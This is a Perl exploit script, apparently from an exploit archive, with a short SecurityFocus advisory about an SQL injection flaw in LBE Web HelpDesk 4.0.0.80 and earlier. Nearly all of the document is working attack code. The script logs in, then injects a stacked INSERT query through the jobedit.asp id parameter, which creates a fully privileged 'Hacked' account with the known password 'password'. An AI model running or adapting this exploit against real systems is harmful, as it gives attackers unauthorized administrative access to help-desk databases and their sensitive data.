151 lines
No EOL
4.1 KiB
Perl
Executable file
151 lines
No EOL
4.1 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/10773/info
|
|
|
|
LBE Web HelpDesk is reported susceptible to an SQL injection vulnerability. This issue is due to improper sanitization of user-supplied data.
|
|
|
|
This issue may allow a remote attacker to manipulate query logic, potentially leading to unauthorized access to sensitive information or corruption of database data. SQL injection attacks may also potentially be used to exploit latent vulnerabilities in the underlying database implementation.
|
|
|
|
Versions 4.0.0.80 and prior are reported vulnerable to this issue.
|
|
|
|
#!/usr/bin/perl
|
|
|
|
use IO::Socket;
|
|
use strict;
|
|
|
|
my $host = $ARGV[0];
|
|
my $Path = $ARGV[1];
|
|
my $Email = $ARGV[2];
|
|
my $Password = $ARGV[3];
|
|
|
|
if (($#ARGV+1) < 4)
|
|
{
|
|
print "lbehelpdesk.pl host path email password\n";
|
|
exit(0);
|
|
}
|
|
|
|
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );
|
|
|
|
unless ($remote) { die "cannot connect to http daemon on $host" }
|
|
|
|
print "Getting default cookie\n";
|
|
|
|
my $http = "GET /$Path/oplogin.asp HTTP/1.1
|
|
Host: $host
|
|
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
|
|
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,ima
|
|
ge/gif;q=0.2,*/*;q=0.1
|
|
Accept-Language: en-us,en;q=0.5
|
|
Accept-Encoding: gzip,deflate
|
|
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
|
|
Connection: close
|
|
|
|
";
|
|
|
|
print "HTTP: [$http]\n";
|
|
print $remote $http;
|
|
sleep(1);
|
|
|
|
my $Cookie = "";
|
|
|
|
while (<$remote>)
|
|
{
|
|
if (/Set-Cookie: ([^;]+;)/)
|
|
{
|
|
$Cookie .= $1." ";
|
|
}
|
|
|
|
# print $_;
|
|
}
|
|
print "\n";
|
|
|
|
close($remote);
|
|
|
|
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );
|
|
|
|
unless ($remote) { die "cannot connect to http daemon on $host" }
|
|
|
|
print "Logging in\n";
|
|
|
|
$remote->autoflush(1);
|
|
|
|
my $http = "POST /$Path/gstlogin.asp HTTP/1.1
|
|
Host: $host
|
|
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
|
|
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
|
|
Accept-Language: en-us,en;q=0.5
|
|
Accept-Encoding: gzip,deflate
|
|
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
|
|
Connection: close
|
|
Referer: http://192.168.1.243/lbehelpdesk/gstlogin.asp
|
|
Cookie: $Cookie
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: ";
|
|
|
|
my $content = "txtemail=$Email&txtpwd=$Password";
|
|
|
|
$http .= length($content)."
|
|
|
|
$content";
|
|
|
|
print "HTTP: [$http]\n";
|
|
print $remote $http;
|
|
sleep(1);
|
|
|
|
my $success = 0;
|
|
while (<$remote>)
|
|
{
|
|
if (/Location: eval.asp/)
|
|
{
|
|
$success = 1;
|
|
print "Login successfull\n";
|
|
}
|
|
|
|
# print $_;
|
|
}
|
|
print "\n";
|
|
|
|
close $remote;
|
|
|
|
if (!$success)
|
|
{
|
|
print "Login failed\n";
|
|
exit(0);
|
|
}
|
|
|
|
$http = "GET /$Path/jobedit.asp?id=0%20;%20INSERT%20INTO%20users%20(%20user_name,".
|
|
"%20password,%20editactiontime,%20orgstructure,%20createviewtemplate,".
|
|
"%20removelogins,%20editlinkedfiles,%20newencrypt,%20showalljobs,".
|
|
"%20publishmacros,%20override_contract%20)%20VALUES%20('Hacked',".
|
|
"%20'60716363677F6274',%201,%201,%201,%201,%201,%20'Y',%201,".
|
|
"%201,%201) HTTP/1.1
|
|
Host: $host
|
|
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
|
|
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
|
|
Accept-Language: en-us,en;q=0.5
|
|
Accept-Encoding: gzip,deflate
|
|
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
|
|
Connection: close
|
|
Referer: http://192.168.1.243/lbehelpdesk/gstlogin.asp
|
|
Cookie: $Cookie
|
|
|
|
";
|
|
|
|
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );
|
|
|
|
unless ($remote) { die "cannot connect to http daemon on $host" }
|
|
|
|
print "HTTP: [$http]\n";
|
|
print $remote $http;
|
|
sleep(1);
|
|
|
|
while (<$remote>)
|
|
{
|
|
if (/Unable to find Job id = 0 ; INSERT INTO users/g)
|
|
{
|
|
print "Successfully added record\nYou can now log on as Hacked/password (Username/Password)\n";
|
|
}
|
|
# print $_;
|
|
}
|
|
|
|
close($remote);
|
|
|
|
# INSERT INTO users ( user_name, password, editactiontime, orgstructure, createviewtemplate, removelogins, editlinkedfiles, newencrypt, showalljobs, publishmacros, override_contract ) VALUES ('Hacked', '60716363677F6274', 1, 1, 1, 1, 1, 'Y', 1, 1, 1) # Password is 'password' |